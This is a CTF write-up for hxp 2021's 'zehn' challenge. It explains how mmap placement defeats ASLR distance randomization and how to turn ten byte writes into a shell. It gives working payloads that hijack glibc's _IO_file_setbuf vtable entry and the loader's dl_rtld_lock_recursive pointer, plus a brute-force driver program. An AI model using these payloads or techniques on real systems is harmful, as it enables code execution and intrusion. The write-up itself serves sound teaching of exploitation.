hxp CTF 2021: zehn writeup

This task is about the determinism of ASLR as implemented by the Linux kernel (in early 2022): one of the mechanisms to obtain an ASLR'd piece of memory is the mmap system call, which, (un)fortunately, places mappings at predictable relative distances from one another. The task description linked a proposed patch set remedying the issue by introducing a randomize_va_space level 3 for full randomization, but so far it hasn't been adopted.
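
To illustrate (a minimal standalone sketch, not challenge code): two consecutive anonymous mappings typically land at a fixed distance from each other, even though the absolute addresses change between runs, because mmap hands out addresses directly adjacent to the previous mapping:

#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    /* Two independent anonymous mappings. */
    void *a = mmap(NULL, 0x10000, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    void *b = mmap(NULL, 0x10000, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    /* The absolute addresses differ between runs (ASLR), but the
       delta between the two mappings stays constant. */
    printf("a=%p b=%p delta=%tx\n", a, b, (char *)a - (char *)b);
    return 0;
}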

The vulnerable program allows writing at most 10 (zehn is German for ten) bytes at user-specified offsets relative to the beginning of a freshly allocated chunk:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    size_t size = 0;
    size_t idx = 0;
    unsigned int i = 0;
    unsigned char val = 0;
    unsigned char *ptr = NULL;
    size_t *doit = NULL;

    if (scanf("%zx", &size) != 1)
        goto fail;

    ptr = calloc(size, sizeof(unsigned char));

    if (!ptr)
        goto fail;

    if ((scanf("%zx", &size) != 1) || !((size < 11) && (size >= 0)))
        goto fail;

    doit = calloc(size, 2 * sizeof(size_t));

    if (!doit)
        goto fail;

    while ((i < size) && (scanf("%zx %hhx", &idx, &val) == 2)) {
        doit[2 * i] = idx;
        doit[2 * i + 1] = val;
        i++;
    }

    for (i = 0; i < size; i++) {
        ptr[doit[2 * i]] = (unsigned char)doit[2 * i + 1];
    }

    exit(0);
fail:
    exit(-1);
}
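
For illustration, here is a benign example interaction (hypothetical input): allocate a 0x21000-byte chunk, then perform a single write of the value 0x41 at offset 0x0. The exploit inputs at the end of this writeup follow the same format:

0x21000 0x1
0x0 0x41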

The first trick is that calloc/malloc fall back to allocating memory via mmap (instead of extending the program break via sbrk) if the requested allocation size is larger than mp_.mmap_threshold. We can confirm this by consulting the source code of the libc version shipped with the challenge. This is malloc.c from glibc 2.33, line 2403:

/*
   sysmalloc handles malloc cases requiring more memory from the system.
   On entry, it is assumed that av->top does not have enough
   space to service request for nb bytes, thus requiring that av->top
   be extended or replaced.
 */

static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
  mchunkptr old_top;              /* incoming value of av->top */
  INTERNAL_SIZE_T old_size;       /* its size */
  char *old_end;                  /* its end address */

  long size;                      /* arg to first MORECORE or mmap call */
  char *brk;                      /* return value from MORECORE */

  long correction;                /* arg to 2nd MORECORE call */
  char *snd_brk;                  /* 2nd return val */

  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
  char *aligned_brk;              /* aligned offset into brk */

  mchunkptr p;                    /* the allocated/returned chunk */
  mchunkptr remainder;            /* remainder from allocation */
  unsigned long remainder_size;   /* its size */


  size_t pagesize = GLRO (dl_pagesize);
  bool tried_mmap = false;


  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      char *mm;           /* return value from mmap call*/

    try_mmap:
      /*
         Round up size to nearest page.  For mmapped chunks, the overhead
         is one SIZE_SZ unit larger than for normal chunks, because there
         is no following chunk whose prev_size field could be used.

         See the front_misalign handling below, for glibc there is no
         need for further alignments unless we have have high alignment.
       */
      if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
      else
        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
      tried_mmap = true;

      /* Don't try if size wraps around 0 */
      if ((unsigned long) (size) > (unsigned long) (nb))
        {
          mm = (char *) (MMAP (0, size,
			       MTAG_MMAP_FLAGS | PROT_READ | PROT_WRITE, 0));
// >% snip

The value of mp_.mmap_threshold can be set at run time via the M_MMAP_THRESHOLD parameter of the mallopt function; by default, the threshold is 0x20000. For example, calloc(0x21000, 1) returns a chunk freshly allocated by mmap at a constant distance from all dynamic libraries in the address space. Hence, no ASLR leak is required to solve this challenge. Furthermore, even though the vulnerable program calls exit immediately after letting the player overwrite (at most) ten bytes, a lot of code is dispatched during exit handling, providing promising targets for reaching code execution.
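
To see this in action, here is a minimal standalone sketch (not challenge code): the printed delta between a beyond-threshold calloc chunk and a libc symbol is identical on every run, while the absolute addresses change:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* 0x21000 > mp_.mmap_threshold (0x20000 by default), so this
       chunk is served by mmap, right next to the loaded libraries. */
    unsigned char *chunk = calloc(0x21000, 1);

    /* Any libc symbol serves as a reference point; the delta is
       constant across runs even with ASLR enabled. */
    printf("chunk=%p system=%p delta=%tx\n",
           (void *)chunk, (void *)&system,
           (unsigned char *)(void *)&system - chunk);
    return 0;
}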

From here, there are many candidate data structures to overwrite. As part of this writeup, we present two possible exploitation vectors.

Approach 1: Abuse Cleanup Mechanism of stdio

During exit, glibc flushes and cleans up all data that might still reside in its internal buffers. During this operation, execution reaches the _IO_cleanup function, which calls _IO_unbuffer_all (the latter has been inlined in the given glibc binary, but this is not a problem for exploitation):

/* The following is a bit tricky.  In general, we want to unbuffer the
   streams so that all output which follows is seen.  If we are not
   looking for memory leaks it does not make much sense to free the
   actual buffer because this will happen anyway once the program
   terminated.  If we do want to look for memory leaks we have to free
   the buffers.  Whether something is freed is determined by the
   function sin the libc_freeres section.  Those are called as part of
   the atexit routine, just like _IO_cleanup.  The problem is we do
   not know whether the freeres code is called first or _IO_cleanup.
   if the former is the case, we set the DEALLOC_BUFFER variable to
   true and _IO_unbuffer_all will take care of the rest.  If
   _IO_unbuffer_all is called first we add the streams to a list
   which the freeres function later can walk through.  */
static void _IO_unbuffer_all (void);

static bool dealloc_buffers;
static FILE *freeres_list;

static void
_IO_unbuffer_all (void)
{
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
    {
      int legacy = 0;

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
	legacy = 1;
#endif

      if (! (fp->_flags & _IO_UNBUFFERED)
	  /* Iff stream is un-orientated, it wasn't used. */
	  && (legacy || fp->_mode != 0))
	{
#ifdef _IO_MTSAFE_IO
	  int cnt;
#define MAXTRIES 2
	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
	      break;
	    else
	      /* Give the other thread time to finish up its use of the
		 stream.  */
	      __sched_yield ();
#endif

	  if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
	    {
	      fp->_flags |= _IO_USER_BUF;

	      fp->_freeres_list = freeres_list;
	      freeres_list = fp;
	      fp->_freeres_buf = fp->_IO_buf_base;
	    }

	  _IO_SETBUF (fp, NULL, 0); /* !!! attack here !!! */

	  if (! legacy && fp->_mode > 0)
	    _IO_wsetb (fp, NULL, NULL, 0);

#ifdef _IO_MTSAFE_IO
	  if (cnt < MAXTRIES && fp->_lock != NULL)
	    _IO_lock_unlock (*fp->_lock);
#endif
	}

      /* Make sure that never again the wide char functions can be
	 used.  */
      if (! legacy)
	fp->_mode = -1;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif
}

The function traverses _IO_list_all and calls _IO_SETBUF on every stream that is not unbuffered. Due to glibc's internal structure, this call is hijackable: stdio's functionality is implemented via vtables, which are lists of function pointers residing in writeable memory. Some sanitization is performed on these vtables at runtime via _IO_vtable_check, but it does not trigger in our case: the check only validates that the vtable pointer stored in the FILE object points into the __libc_IO_vtables section; it does not validate the individual entries of the table. Since we overwrite an entry inside the legitimate _IO_file_jumps table, the pointer still refers to a recognized vtable and the check passes.
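
For reference, the check in glibc's libioP.h looks roughly as follows (paraphrased sketch, not a verbatim quote): only the vtable pointer itself is range-checked against the __libc_IO_vtables section; the entries it points to are not validated at all:

/* Paraphrased from libioP.h: the vtable *pointer* is validated,
   the function pointers it contains are not. */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t offset = (uintptr_t) vtable - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* Pointer is outside the expected section: abort unless it is a
       known-good vtable (e.g. from a dlopen'd libc). */
    _IO_vtable_check ();
  return vtable;
}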

To understand what’s going on, we need the definitions of struct _IO_FILE, which is wrapped by struct _IO_FILE_complete, as defined in struct_FILE.h (line 46):

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

This structure is embedded into a struct _IO_FILE_plus, which appends a trailing pointer to the vtable:

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};
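
On x86-64, the FILE part occupies 0xd8 bytes, so the vtable pointer lives at offset 0xd8 into struct _IO_FILE_plus, matching the offset we will see in the disassembly below. A quick standalone check (a sketch; it assumes glibc, where the public FILE typedef covers the complete structure):

#include <stdio.h>

int main(void)
{
    /* The vtable pointer of struct _IO_FILE_plus directly follows
       the FILE member, i.e. it sits at offset sizeof(FILE). */
    printf("sizeof(FILE) = %#zx\n", sizeof(FILE)); /* 0xd8 on x86-64 glibc */
    return 0;
}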

Putting all of this together, the memory layout of _IO_2_1_stdin_ looks as follows:

.data:00000000001C0800                 public _IO_2_1_stdin_
.data:00000000001C0800 _IO_2_1_stdin_  dd 0FBAD2088h           ; DATA XREF: LOAD:0000000000009B40↑o
.data:00000000001C0800                                         ; .got:_IO_2_1_stdin__ptr↑o ...
.data:00000000001C0804                 dq 0                    ; _IO_read_ptr
.data:00000000001C080C                 dq 0                    ; _IO_read_end
.data:00000000001C0814                 dq 0                    ; _IO_read_base
.data:00000000001C081C                 dq 0                    ; _IO_write_base
.data:00000000001C0824                 dq 0                    ; _IO_write_ptr
.data:00000000001C082C                 dq 0                    ; _IO_write_end
.data:00000000001C0834                 dq 0                    ; _IO_buf_base
.data:00000000001C083C                 dq 0                    ; _IO_buf_end
.data:00000000001C0844                 dq 0                    ; _IO_save_base
.data:00000000001C084C                 dq 0                    ; _IO_backup_base
.data:00000000001C0854                 dq 0                    ; _IO_save_end
.data:00000000001C085C                 dq 0                    ; _markers
.data:00000000001C0864                 dq 0                    ; _chain
.data:00000000001C086C                 dd 0                    ; _fileno
.data:00000000001C0870                 dd 0                    ; _flags2
.data:00000000001C0874                 dq 0FFFFFFFF00000000h   ; _old_offset
.data:00000000001C087C                 dw 0FFFFh               ; _cur_column
.data:00000000001C087E                 db 0FFh                 ; _vtable_offset
.data:00000000001C087F                 db 0FFh                 ; _shortbuf
.data:00000000001C0880                 db    0
.data:00000000001C0881                 db    0
.data:00000000001C0882                 db    0
.data:00000000001C0883                 db    0
.data:00000000001C0884                 db    0
.data:00000000001C0885                 db    0
.data:00000000001C0886                 db    0
.data:00000000001C0887                 db    0
.data:00000000001C0888                 dq offset _IO_stdfile_0_lock ; _lock
.data:00000000001C0890                 dq 0FFFFFFFFFFFFFFFFh   ; _offset
.data:00000000001C0898                 dq 0                    ; _codecvt
.data:00000000001C08A0                 dq offset _IO_wide_data_0 ; _wide_data
.data:00000000001C08A8                 dq 0                    ; _freeres_list
.data:00000000001C08B0                 dq 0                    ; _freeres_buf
.data:00000000001C08B8                 dq 0                    ; __pad5
.data:00000000001C08C0                 dd 0                    ; _mode
.data:00000000001C08C4                 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ; _unused2
.data:00000000001C08C4                 db 0, 0
.data:00000000001C08D8                 dq offset __GI__IO_file_jumps  ; vtable

Combine this knowledge of the data structure with the disassembly of _IO_cleanup/_IO_unbuffer_all:

; %< snip >%
.text:0000000000083A53 loc_83A53:                              ; CODE XREF: _IO_cleanup+6E↑j
.text:0000000000083A53                 mov     eax, dword ptr cs:list_all_lock+4
.text:0000000000083A59                 mov     r14, cs:__GI__IO_list_all
; >% snip %<
.text:0000000000083B1C loc_83B1C:                              ; CODE XREF: _IO_cleanup+14F↑j
.text:0000000000083B1C                                         ; _IO_cleanup+2B6↓j
.text:0000000000083B1C                 mov     rax, [r14+0D8h]
; >% snip %<
.text:0000000000083B32 loc_83B32:                              ; CODE XREF: _IO_cleanup+317↓j
.text:0000000000083B32                 xor     edx, edx
.text:0000000000083B34                 xor     esi, esi
.text:0000000000083B36                 mov     rdi, r14
.text:0000000000083B39                 call    qword ptr [rax+58h]

First, r14 is initialized at 0x83a59 to point to the beginning of the list of file structures. Then the vtable member at structure offset 0xd8 is loaded into rax. Within the _IO_file_jumps table, the function pointer at offset 0x58 is, unsurprisingly, __GI__IO_file_setbuf:

__libc_IO_vtables:00000000001C2300 __GI__IO_file_jumps dq 0                ; DATA XREF: LOAD:000000000000E358↑o
__libc_IO_vtables:00000000001C2300                                         ; check_stdfiles_vtables+B↑o ...
__libc_IO_vtables:00000000001C2300                                         ; Alternative name is '_IO_file_jumps'
__libc_IO_vtables:00000000001C2308                 dq 0
__libc_IO_vtables:00000000001C2310                 dq offset __GI__IO_file_finish
__libc_IO_vtables:00000000001C2318                 dq offset __GI__IO_file_overflow
__libc_IO_vtables:00000000001C2320                 dq offset __GI__IO_file_underflow
__libc_IO_vtables:00000000001C2328                 dq offset __GI__IO_default_uflow
__libc_IO_vtables:00000000001C2330                 dq offset __GI__IO_default_pbackfail
__libc_IO_vtables:00000000001C2338                 dq offset __GI__IO_file_xsputn
__libc_IO_vtables:00000000001C2340                 dq offset __GI__IO_file_xsgetn
__libc_IO_vtables:00000000001C2348                 dq offset __GI__IO_file_seekoff
__libc_IO_vtables:00000000001C2350                 dq offset _IO_default_seekpos
__libc_IO_vtables:00000000001C2358                 dq offset __GI__IO_file_setbuf   ; <- attackable pointer
__libc_IO_vtables:00000000001C2360                 dq offset __GI__IO_file_sync
__libc_IO_vtables:00000000001C2368                 dq offset __GI__IO_file_doallocate
__libc_IO_vtables:00000000001C2370                 dq offset __GI__IO_file_read
__libc_IO_vtables:00000000001C2378                 dq offset _IO_new_file_write
__libc_IO_vtables:00000000001C2380                 dq offset __GI__IO_file_seek
__libc_IO_vtables:00000000001C2388                 dq offset __GI__IO_file_close
__libc_IO_vtables:00000000001C2390                 dq offset __GI__IO_file_stat
__libc_IO_vtables:00000000001C2398                 dq offset _IO_default_showmanyc
__libc_IO_vtables:00000000001C23A0                 dq offset _IO_default_imbue

From here, exploitation is straightforward: perform a 3-byte partial overwrite on the __GI__IO_file_setbuf pointer stored at libc_base+0x1C2358 so that it points to system (requiring a 12-bit ASLR bruteforce, since only the lowest 12 bits of the address are fixed), and write the string ;sh to address libc_base+0x1C0804 to set up the first argument for system. The dispatching call at libc_base+0x83B39 passes a pointer to the file structure itself to the callee, so system receives the raw bytes of the FILE object as its command string. The file structure starts with the file magic 0xFBAD2088, whose status bits steer the cleanup logic and which we therefore prefer not to touch; instead, we simply overwrite the 3 bytes immediately following it with ;sh, making sure we still reach the vulnerable call. The ; terminates the meaningless garbage command formed by the magic bytes, and sh then gives us code execution.

To trigger code execution, pass (for example) the following input to the vulnerable program, keeping in mind the 12-bit ASLR bruteforce (each attempt succeeds with probability 1/4096):

0x30000 0x6       allocation size and number of bytes to write
0x1f5348 0xe0     partially overwrite _IO_file_jumps._IO_file_setbuf with pointer to system (XXXde0) 
0x1f5349 0x7d
0x1f534a 0x13
0x1f37f4 0x3b     overwrite _IO_2_1_stdin_._IO_read_ptr with ";sh"
0x1f37f5 0x73
0x1f37f6 0x68
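
A small wrapper can automate the brute force. The following is a hypothetical driver sketch; the local binary name ./zehn, the flag path, and the success heuristic are assumptions. A wrong guess crashes the target with SIGSEGV during exit handling; a correct one makes system(";sh") spawn a shell that reads further commands from the inherited pipe:

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

int main(void)
{
    /* The payload from above: point the setbuf entry of
       _IO_file_jumps at system (24-bit guess ending in 0xde0) and
       place ";sh" right after _IO_2_1_stdin_'s _flags word. */
    static const char payload[] =
        "0x30000 0x6\n"
        "0x1f5348 0xe0\n0x1f5349 0x7d\n0x1f534a 0x13\n"
        "0x1f37f4 0x3b\n0x1f37f5 0x73\n0x1f37f6 0x68\n";

    for (unsigned attempt = 1;; attempt++) {
        FILE *p = popen("./zehn", "w");
        if (!p)
            exit(1);
        fputs(payload, p);
        /* If the ASLR guess was right, sh reads this from the pipe. */
        fputs("cat flag.txt; exit\n", p);
        int status = pclose(p);
        /* Wrong guess: the hijacked vtable call jumps into the weeds
           and the target dies with SIGSEGV. Right guess: sh runs our
           command and exits cleanly. */
        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
            fprintf(stderr, "success after %u attempts\n", attempt);
            return 0;
        }
    }
}

With 12 unknown bits, a successful run takes 4096 attempts on average.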

Approach 2: Abuse Locking Mechanism of the Loader

The _dl_fini function is responsible for destructor handling of dynamically loaded objects. It is (almost) always called on program termination, and it dispatches globally writeable function pointers that can be overwritten to gain code execution.

The interesting part is in lines 29 to 54 of dl-fini.c:

void
_dl_fini (void)
{
  /* Lots of fun ahead.  We have to call the destructors for all still
     loaded objects, in all namespaces.  The problem is that the ELF
     specification now demands that dependencies between the modules
     are taken into account.  I.e., the destructor for a module is
     called before the ones for any of its dependencies.

     To make things more complicated, we cannot simply use the reverse
     order of the constructors.  Since the user might have loaded objects
     using `dlopen' there are possibly several other modules with its
     dependencies to be taken into account.  Therefore we have to start
     determining the order of the modules once again from the beginning.  */

  /* We run the destructors of the main namespaces last.  As for the
     other namespaces, we pick run the destructors in them in reverse
     order of the namespace ID.  */
#ifdef SHARED
  int do_audit = 0;
 again:
#endif
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));


Line 54 expands to

  GL(dl_rtld_lock_recursive) (&(GL(dl_load_lock)).mutex)

which in turn expands to

    _rtld_global.dl_rtld_lock_recursive(&_rtld_global.dl_load_lock.mutex)

Since both live in the writeable global variable _rtld_global, one can overwrite both the function pointer dl_rtld_lock_recursive and the dl_load_lock mutex to gain an easy system("sh") primitive: the argument passed to the hijacked call is the address of the mutex itself, so writing the string "sh" into the mutex turns the call into system("sh"). The dl_rtld_lock_recursive pointer points to rtld_lock_default_lock_recursive in a single-threaded application, and to pthread_mutex_lock if the victim program is linked against libpthread. Both are a fair distance away from system, hence a 3-byte overwrite is required to reach code execution. Of the overwritten 3*8 = 24 bits, the lowest 12 are fixed (0xde0, the page offset of system within libc), leaving 12 ASLR'd bits to brute-force.

For the ld binary handed out with the challenge, this means writing "sh" to ld_base+0x30988, and a 24-bit value ending in 0xde0 (the last three nibbles of system@glibc) to ld_base+0x30f90.

To trigger code execution, pass (for example) the following input to the vulnerable program, keeping in mind the 12-bit ASLR bruteforce (each attempt succeeds with probability 1/4096):

0x1000000 0x5       allocation size and number of bytes to write
0x1206978 0x73      overwrite _rtld_global.dl_load_lock.mutex with "sh"
0x1206979 0x68
0x1206f80 0xe0      partially overwrite _rtld_global.dl_rtld_lock_recursive with pointer to system (XXXde0) 
0x1206f81 0xbd
0x1206f82 0x4b
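
The driver sketched at the end of approach 1 works here unchanged; only the payload string needs to be swapped out (offsets taken from the listing above):

/* Approach-2 payload for the driver sketch from approach 1: "sh"
   into the dl_load_lock mutex, and a 24-bit guess ending in 0xde0
   over the dl_rtld_lock_recursive pointer. */
static const char payload[] =
    "0x1000000 0x5\n"
    "0x1206978 0x73\n0x1206979 0x68\n"
    "0x1206f80 0xe0\n0x1206f81 0xbd\n0x1206f82 0x4b\n";

Since system here receives the clean command string "sh" from the zero-initialized mutex, there is no need for the leading ; trick from approach 1.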